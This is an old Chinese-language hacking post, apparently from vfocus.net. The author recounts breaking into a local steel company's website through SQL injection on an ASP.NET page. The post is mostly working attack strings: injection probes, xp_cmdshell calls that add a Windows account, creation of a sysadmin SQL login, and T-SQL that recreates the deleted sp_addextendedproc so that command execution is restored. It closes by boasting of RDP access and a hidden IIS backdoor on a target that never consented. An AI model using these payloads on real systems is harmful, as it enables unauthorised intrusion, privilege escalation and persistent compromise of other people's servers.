首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
注射MSSQL时解决的一个未有人提到过的问题
来源:vfocus.net 作者:vfocus 发布时间:2004-09-03  

注射MSSQL时解决的一个未有人提到过的问题


今天没事做,对本地的一家钢铁企业的网站做了次安检,嘿嘿.漏洞一大把.当然 这是意料中的事.最近搞大家都喜欢搞脚本.那我也就从他们的网站程序看看了.
show.aspx?id=1'
嘿嘿 asp.net 照样暴 说什么有未闭合的分号.
show.aspx?id=1 and (select @@version)>0;--
果然,2003的系统
show.aspx?id=1 and 'sa'=(select System_user)--
嘿嘿 正确返回 有权限了 想到直接用xp_cmeshell直接添加帐号
因为之前已经知道这服务器开了3389的
所以 我们继续来:
show.aspx?id=1;exec master.dbo.xp_cmdshell "net user haco lovehaco /add"--
我倒,返回结果错误了 看来管理员还不是很可爱噢
那我们来恢复这个存储过程?OK 继续
show.aspx?id=1;exec master.dbo.sp_addextendedpro xp_cmdshell,@dllname='xplog70.dll'--
回车后……狂晕死.居然说什么过程sp_addextendedproc没找着 开始我以为是删除了xplog70.dll 可是后来不这样这样认为了 记得以前也碰到过这样的事 可是都没能解决 这次一定要搞定 嘿嘿!之后 到处问人
这里要感谢一下BST论坛里的tob88 谢谢 是他提醒了我
不就是过程SP_ADDextendedproc被删除了嘛 我们恢复它就是了嘛!
为了方便 我添加了个sysadmin的帐号
show.aspx?id=1;exec master.dbo.sp_addlogin haco,lovehaco;--
show.aspx?id=1;exec master.dbo.sp_addsrvrolemember haco,sysadmin;-- HOHO~ 搞定 俺自己装了MSSQL 企业管理器里连上这台服务器的SQL
调出查询器 恢复过程sp_addextendedproc 如下:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
哈哈 试下 sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
哇!命令成功完成 耶!添加帐号 登陆3389 留个我最喜欢的绝对后门
IIS隐藏虚拟目录 搞定 闪人……

PS:其实像sp_addextendedproc这些过程也都可以删除掉 就不能添加了
当然 也可以恢复的 这个恢复的语句 是从MSSQL数据库里得到的 有兴趣的朋友可以自己试试看 呵呵 这是我小泥巴第一次写东西 很稀烂的 大家看看就算了 别笑噢 要不 我会5555哭的噢!



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WFTPD Pro Server 3.21 MLST Rem
·AOL Instant Messenger AIM "Awa
·TiTan FTP Server Long Command
·Courier-IMAP <= 3.0.2-r1 au
·D-Link DCS-900 camera Remote E
·TorrentTrader 1.0 RC2 SQL Inje
·MusicDaemon<= 0.0.3 v2 Remo
·cdrdao local root exploit
·Ground Control<= 1.0.0.7 se
·Citadel/UX <= 6.23 Remote U
·Citadel/UX Remote Buffer Overf
·PHP-Nuke 7.4 SQL Injection Exp
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved